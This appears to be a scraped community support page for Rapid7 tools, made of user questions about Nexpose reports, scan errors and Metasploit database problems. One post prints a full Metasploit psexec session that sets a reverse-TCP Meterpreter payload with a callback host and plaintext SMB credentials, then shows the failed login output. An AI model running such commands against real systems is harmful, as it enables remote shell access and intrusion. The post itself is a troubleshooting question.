We're not able to manage vulnerabilities and exceptions in Nexpose based on a vulnerability instance's proof, and we were wondering if other companies disregard proof in their vul mgmt programs? If you disregard Proof, what is your rationale? If you use Proof, how are you doing so? See related comment on https://blog.rapid7.com/2015/01/23/the-pudding-is-in-the-proof-the-importance-of-proofs-in-vulnerability-management/ for more about what we think are issues with not incorporating proof into the definition of a vulnerability instance. Maybe we're looking at it all wrong?
Posted by Lauren Babis 10 months ago
Hello all, I need some assistance with a custom SQL query. I'd like to run a report looking for servers (or all assets) only listing vulnerabilities pertaining to the following groups: Java, Adobe (Flash, Reader, etc.), and Microsoft. For each of those groups I'd like to have a breakdown of the risk associated with all of the vulnerabilities per group. So for example the output would be so: Server 1, Risk score - 200,000, Java Risk - 50,000, Adobe Risk - 75,000, Microsoft Risk - 75,000. Please let me know if this is possible via SQL. So far I have only been able to export assets with their total risks associated to them. Thanks!
Posted by Brandon Spencer 10 months ago
Hi, I'm not a programmer, I don't understand what a JSON is, nor do I know the first thing about what an API does or how to use or configure one. I hope to change that someday, but for now I just want to import txt files from different devices on a network and have a program sort each entry of each txt by time so I can see log events of all devices in order by time. Is that possible with your system, and if so, how can I do this? If this isn't what your program was designed to do, could you be so kind as to point me in the right direction? I appreciate your help. Kind Regards, Stuart
Posted by Stuart Knight 10 months ago
Hi, I am receiving 'Cannot allocate memory -infocmp (Errno- ENOMEM)' error message on using metasploit. The KALI OS is newly installed on VM with 1.5 GB RAM. I get this error whenever I start firefox and openvpn along with metasploit. Kindly let me know, what should I do to make the tool work. (I have tried reinstalling the OS on VM, still I get same error)
Posted by Akriti Srivastava 10 months ago
Hello, I have searched here and on the web extensively to try and solve this never ending problem. I continue to get this error message:

[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 7337?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 7337?

I then exit metasploit and enter in a terminal:

:~:service postgresql start

I then restart metasploit and now get this error:

[-] Failed to connect to the database: FATAL: password authentication failed for user "msf3"
FATAL: password authentication failed for user "msf3"

I am completely out of ideas on what to do. Any help would be extremely appreciated. For the record I am in no way extensively experienced. I am still very new and learning. Thank you again for any help.
Posted by Daniel Guerreiro 10 months ago
We have hundreds of domain names. Some are active, some are old ones we have parked, and others are forwarded to the main sites. Needless to say, it would take some time adding them into the list of trusted domains. However, GoDaddy, name.com and a few others have APIs where InsightIDR could get a periodic list of the domains that are active and we would not need to maintain that list personally. https://developer.godaddy.com/doc https://www.name.com/api_about
Posted by Chris Bachmann 10 months ago
Is there an option to run a Vulnerabilities Report that can filter information by the highest CVSS score, highest risk and define it by those Sites in our environment? I am able to run a general vulnerabilities report, but this does not include the Sites in the report.
Posted by Gene 10 months ago
Hi All, Please see the error message when running exploit. It does not seem to get past authentication.

msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set RHOST 139.49.19.13
RHOST => 139.49.19.13
msf exploit(windows/smb/psexec) > set LHOST 139.49.153.201
LHOST => 139.49.153.201
msf exploit(windows/smb/psexec) > set SMBDomain CORP
SMBDomain => CORP
msf exploit(windows/smb/psexec) > set SMBUser "localadmin"
SMBUser => localadmin
msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd"
SMBPass => MrPassw0rd
msf exploit(windows/smb/psexec) > set LPORT 4444
LPORT => 443
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 139.49.153.201:4444
[*] 139.49.19.13:445 - Connecting to the server...
[*] 139.49.19.13:445 - Authenticating to 139.49.19.13:445| as user 'CORP\localadmin'...
[-] 139.49.19.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/psexec) > version
Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b
Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b

I tested authentication by running the sysinternals psexec outside of metasploit. psexec was successful.

C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\139.49.19.13 -u CORP\localadmin cmd
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Password:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
CORP\localadmin

Same result by using exploit psexec_psh. Please give advice. Thanks. Regards, AA
Posted by aa 11 months ago
Hello, I receive the below error after creating a new site from an imported list of IPs and attempting to run the scan. Failed (Scan failed to start on engine [ID: 10]: /opt/rapid7/nexpose/nse/consoles/1/tmp/10_8893135199960014058: No space left on device) Thanks much in advance.
Posted by Keith Evans 11 months ago
Using Nexpose, is it possible to scan multiple VPCs within a Site? Been attempting to set up a site where more than one VPC is referenced but keep getting an error that there are no assets available. I want to confirm if this is an error in my setup or this is not a capability. I'm able to set up 1 VPC per SITE, but needing to combine, for example, all prod - VPCs in one site, all stage- VPCs in one site, etc.
Posted by Selina Zimmerman 11 months ago
Hi, I'm looking for a query that shows me the locked accounts over a specific time frame. This can be done by simply using ACCOUNT_LOCKED in the Active Directory Admin Activity. I can also count the unique locked accounts. However I would like to have a query that checks if an account is locked more than once in, for example, an hour, instead of receiving an alert each time an account is locked.
Posted by Tom 11 months ago
Is it possible to generate a report with only the selected vulnerabilities? Basically I'm trying to create a summary report excluding the safe and informational vulnerabilities. I tried filtering on severity and then selecting those, but when I generate the report it includes everything.
Posted by Mike Kauspedas 11 months ago
My client's company is making a vulnerability assessment to Nexpose of assets being serviced over AWS. I have entered the Access key and Secret Key to scan AWS assets, but I am unable to retrieve them from Nexpose. These are the findings I made during a few tests.
1. When I checked my scan logs, there was no problem locating the assets. This means that AWS keys are not considered problematic.
2. The asset has been viewed successfully, but the scan is failing. Based on what is printed on the UI, it does not appear that the information from the viewed assets can be saved to the site.
Please let me know what is wrong and what is the solution. I will attach a screenshot related to the above.
Posted by yryim 11 months ago
I would like to create a template that attempts a host of scenarios that relate to the OWASP T10 of web apps (so XSS, CSRF, SQLi, etc.). The web spidering engine says "It then analyzes this information for evidence of security flaws such as SQL injection, cross-site scripting (CSS/XSS), backup script files, readable CGI scripts, insecure password use, and other issues resulting from software defects or configuration errors". Does this mean it's actively testing these things (i.e. validate they are present)? Or just flag if behavior is similar?
Posted by Eric A 11 months ago
I'm trying to finalize our scan environment for Nexpose. I have a security controller (a VM) licensed and set up, working in order. And due to our geographical diversity I needed to have scan engines set up at various locations, also VMs. I have installed the scan engine software on the remote VMs. When I tried to add these newly set up scan engines to the console, I receive an error "scan engine certificate does not match stored certificate". Can you please help resolving this? I have excluded these scan engines from all of our IPS, Firewalls, McAfee HIPS and other devices in our infrastructure. Any prompt response would be greatly appreciated. Thanks, Chakra
Posted by Chakravarthy.mandavilli@ghd.com 11 months ago
Yesterday I noticed I couldn't connect to the Nexpose portal. I went to the installed server, and saw the Nexpose Security Console Service wasn't running. I clicked start and got an error message: Error 255: the extended attributes are inconsistent. I downloaded and reinstalled the product, and restarted the server, but I still get the same response.
Posted by Dan Guzman 11 months ago